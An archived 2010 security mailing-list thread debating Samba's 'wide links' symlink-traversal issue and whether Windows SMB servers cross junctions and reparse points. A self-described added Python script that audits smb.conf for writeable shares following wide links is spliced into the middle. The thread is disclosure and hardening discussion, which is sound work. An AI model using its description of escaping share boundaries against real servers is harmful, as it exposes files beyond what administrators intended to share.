Unless the reparse point already exists.

This particular exploit happened to involve a remote user creating a
symlink. That doesn't mean there are no other imaginable vulnerabilities
stemming from filesystem objects that violate the notional tree
structure of the directory hierarchy.

The obvious one: someone shares a branch of the directory tree in the
belief that clients only have access to that part of the tree, but the
tree already contains a convenience symlink (Unix) or reparse point
(Windows) that points elsewhere in the hierarchy. That's one reason why
Samba has had the "wide links=no" option since, what, the mid-1990s.


--
Michael Wojcik
Principal Software Systems Developer, Micro Focus




David.Jacoby at truesec

Feb 9, 2010, 7:44 AM

Post #24 of 25 (2238 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Hi FD,

This is not a zero-day vulnerability in the concept of a programmatic
flaw. But if no one, or the majority of all Samba users, never knew that
this option was available, or knew that this functionality was enabled
by default, I think this problem should still be highlighted in the way
that the Samba team did.

I think it's good that people increase awareness of these types of problems
because they are all over the place. It's also one of the reasons why it's
so important to harden your default installation, because configuration options
like this one tend to be enabled by default.

I think it was a good finding and I'm glad that people are discussing it.

Best regards,
David Jacoby



-----Original Message-----
From: paul.szabo [at] sydney [mailto:paul.szabo [at] sydney]
Sent: den 6 februari 2010 22:48
To: bugtraq [at] securityfocus; full-disclosure [at] lists
Subject: Re: Samba Remote Zero-Day Exploit

I find it puzzling how this discussion, including the official Samba
response

http://www.samba.org/samba/news/symlink_attack.html

fails to consider whether the mentioned configuration (when admin sets
non-default "writeable = yes" but leaves default "wide links = yes")
allows write access to the whole filesystem (where the user has UNIX
rights). I also wonder about the interaction with the setting of "unix
extensions" (which I had set to non-default "no" to help Mac clients).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
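Paul's question above (a non-default "writeable = yes" left alongside the default "wide links = yes") and Michael's earlier point about pre-existing convenience symlinks describe a configuration state that can be audited mechanically. The following is an added example, not code from this thread or from the Samba project; the share defaults it encodes (wide links and follow symlinks on, shares read-only, guests off) are assumptions taken from the discussion and Samba 3.x documentation, and SAMPLE_SMB_CONF is constructed.

```python
import configparser

# Samba 3.x share defaults as discussed in the thread (assumed here):
# 'wide links' and 'follow symlinks' on, shares read-only, guest access off.
DEFAULTS = {"wide links": "yes", "follow symlinks": "yes", "writeable": "no", "guest ok": "no"}
TRUE = {"yes", "true", "1"}

def parse(text):
    # Keys are case/whitespace-insensitive; strip indentation so configparser
    # does not read indented 'key = value' lines as continuation lines.
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = lambda key: " ".join(key.lower().split())
    cp.read_string(flat)
    return cp

def effective(cp, share):
    # Merge [global] and share-level values, mapping Samba's synonyms.
    merged = dict(DEFAULTS)
    for section in [s for s in cp.sections() if s.lower() == "global"] + [share]:
        for key, value in cp.items(section):
            value = value.strip().lower()
            if key in ("writable", "write ok"):
                key = "writeable"
            elif key == "read only":  # inverse of 'writeable'
                key, value = "writeable", "no" if value in TRUE else "yes"
            elif key == "public":
                key = "guest ok"
            merged[key] = value
    return merged

def audit(text):
    # (share, exposure) for every writeable share that still follows wide links.
    cp, findings = parse(text), []
    for share in (s for s in cp.sections() if s.lower() != "global"):
        eff = effective(cp, share)
        if all(eff[k] in TRUE for k in ("writeable", "wide links", "follow symlinks")):
            findings.append((share, "preauth" if eff["guest ok"] in TRUE else "authenticated"))
    return findings

# Constructed sample smb.conf (not from the thread); [docs] is the hardened form.
SAMPLE_SMB_CONF = """[testmount]
   writeable = yes
[public]
   Read Only = no
   guest ok = yes
[docs]
   writable = yes
   wide links = no
"""
```

`audit(SAMPLE_SMB_CONF)` flags `testmount` (authenticated users) and `public` (guest, so pre-auth) and passes `docs`; a `wide links = no` placed in `[global]` clears every share at once.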



stefan.kanthak at nexgo

Feb 9, 2010, 12:53 PM

Post #25 of 25 (2249 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Michael Wojcik wrote:

>> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> Sent: Monday, 08 February, 2010 16:33
>>
>> Michael Wojcik wrote:
>>
>> >> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> >> Sent: Saturday, 06 February, 2010 08:21
>> >>
>> >> Since Windows 2000 NTFS supports "junctions", which pretty much
>> >> resemble Unix symlinks, but only for directories.
>> >> See <http://support.microsoft.com/kb/205524/en-us>
>> >
>> > And at least since Vista, it also supports symlinks, which are
>> > designed
>>
>> s/at least//
>> [ well-known facts snipped ]
>
> So ... your original note about junctions did not cover "well-known
~~~~~~~~~~~~~
> facts", but my note about other reparse point types did?

It's best practice (see http://www.ietf.org/rfc/rfc1855.txt) not to
include unreferenced parts of the message to be answered. There's no
need to repeat undisputed and undoubtedly correct facts.

>> > The Windows SMB server apparently won't cross reparse points, though,
>> > so there's no equivalent vulnerability.
>>
>> NO, Windows SMB server crosses reparse points!
>
> Not in my testing, at least not for junctions and symlinks.

I've been using junctions on Windows 2000/XP/2003 since at least 2002, and
of course they are traversed on shares too!

> User with
> requisite authority could traverse the junctions and symlinks locally,
> but not remotely via a share.

Test again!

>> But as Dan Kaminsky pointed out, you need to have administrative rights
>> to remotely create a junction on an SMB share, so the non-admin user
>> can't get himself access to files outside a share he's allowed to
>> access.
>
> Unless the reparse point already exists.

Of course, but that's not the question here.

> This particular exploit happened to involve a remote user creating a
> symlink.

Correct. But to accomplish that, the "unix extensions" need to be
enabled in the first place.

> That doesn't mean there are no other imaginable vulnerabilities
> stemming from filesystem objects that violate the notional tree
> structure of the directory hierarchy.
>
> The obvious one: someone shares a branch of the directory tree in the
> belief that clients only have access to that part of the tree, but the
> tree already contains a convenience symlink (Unix) or reparse point
> (Windows) that points elsewhere in the hierarchy. That's one reason why
> Samba has had the "wide links=no" option since, what, the mid-1990s.

I've been using Samba since 1993 and know that quite well.
You surely can find my name in some places in the docs and other files
of the distribution too.-)

Stefan

PS: would you mind setting up your Exchange Server correctly? It rebreaks
cited lines and destroys the correct quoting.
